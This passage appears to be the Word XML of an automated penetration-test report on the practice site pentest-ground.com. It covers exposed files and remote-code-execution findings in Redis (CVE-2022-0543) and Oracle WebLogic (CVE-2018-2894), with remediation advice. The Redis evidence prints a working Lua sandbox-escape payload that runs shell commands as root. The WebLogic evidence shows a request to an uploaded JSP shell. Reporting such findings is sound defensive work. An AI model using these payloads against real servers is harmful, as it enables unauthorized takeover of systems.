              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Internal documentation file often used in projects which can contain sensitive information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11091D59"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4480F37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5B7A3E5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11174363"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71">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/setup.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6AE4794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2093FE0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Page Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57E442D3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Setup :: Damn Vulnerable Web A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="58134A6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A0EB1AD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Page Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C31BEF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>5.03 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6557884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7197208" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26389FCF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>The setup.php may contain sensitive informations such as users and credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A1357CA"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6D3037E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31BDE57" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F2D700B"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72">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/phpinfo.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="35850D0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DDE7F73" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Page Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BCC3E77" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>PHP 8.4.3 - phpinfo()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="27E408A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C52CA45" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Page Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F26A065" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>79.18 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4E05048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22DA159" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B93BEA1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>phpinfo() exposes information about the configuration of the PHP environment and server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="318B60F2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="4B12FCB4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32756899" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We have discovered that the target application exposes 'interesting' files or folders, which are typically hidden or not intended for public access. This vulnerability is often a result of improper file and directory permissions or server misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A7BF0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B19588" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that these files/folders usually contain sensitive information which may help attackers to mount further attacks against the server. Manual validation is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C25919" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0F3FD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend you to analyze if the mentioned files/folders contain any sensitive information and restrict their access according to the business purposes of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD1DEE"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5814A542"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0D721851" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D1BA1A2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3BC53C8A" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B14B3EA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5446D0CD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId173">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-200</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0E1B0E22" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18B03B79" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BE6536B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId174">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="07E3181F" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EF9F529" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="163EF253" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId175">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E21190E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CB05FA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="989898"/>
        </w:rPr>
        <w:t>✘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B12421" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C3FDCD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc190270971"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2 Target:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="24EC6609" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>pentest-ground.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C132277" w14:textId="2B070568" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>4.2.1 Redis - Remote Code Execution (CVE-2022-0543)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="05C6A4A4" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="251DF5BD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09692A95" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="22933E38" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C114E3" wp14:editId="5E4B3EDA">
                  <wp:extent cx="1397000" cy="1397000"/>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653810E7" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30A6E732" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E0024CF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
          <w:p w14:paraId="3690E328" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Port: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="434343"/>
              </w:rPr>
              <w:t>6379</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="6F6733B8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32ED5FE3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57844581" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We managed to detect this vulnerability by evaluating the payload that contains the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Data received:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B4EFE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C213AF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found that the target server is vulnerable to CVE-2022-0543, a Remote Code Execution vulnerability in the Redis caching service. The root cause of this vulnerability consists in an unexpected sandbox escape on Debian systems because of the dynamically load of the Lua interpreter. Therefore, an unauthenticated remote attacker can connect to the Redis service, evaluate a library load and execute shell commands.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">We have detected this vulnerability by connecting to the Redis service, loading </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>liblua5.1.so.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> library, executing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command and reading the command response from the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B79D6E7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C36037B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk exists that a remote unauthenticated attacker can fully compromise the server in order to steal confidential information, install ransomware or pivot to the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F305BEE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D436F90" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend upgrading the Redis service to a version equal to or higher than 5:5.0.14-1+deb10u2 for the oldstable version, or 5:5.0.14-1+deb10u2 for the stable distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1BA055" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E2BF7D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId176">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0543</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12D8D363" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId177">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2022-0543</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2332408D"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3A3AD167"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59E334EB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C71F116" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="667E5E61" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D80325B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A18DA60" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="22FD10F9" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18F79059" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C696964" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE-2022-0543</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6180ECA8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A03DED2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7187E671" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A07A2F" w14:textId="46268569" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.2 Oracle Weblogic - Remote Code Execution (CVE-2018-2894)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1B9D39A3" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="787C1D96" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C87EC64" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="15849D8F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07B70ABD" wp14:editId="1423AA76">
                  <wp:extent cx="1397000" cy="1397000"/>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453155EC" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79B8EF03" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46B64D43" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
          <w:p w14:paraId="5ABED0E4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Port: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="434343"/>
              </w:rPr>
              <w:t>7001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="65609497" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10BA1C40" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDA6ABD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We managed to detect this vulnerability using the following request, by extracting the current user using the whoami/id command:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>HTTP Request:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>GET /ws_utc/css/config/keystore/1738221567457_cfymiqrstcohwfr.jsp HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Host: pentest-ground.com </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>HTTP Response:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>HTTP 200</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3DA3F0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
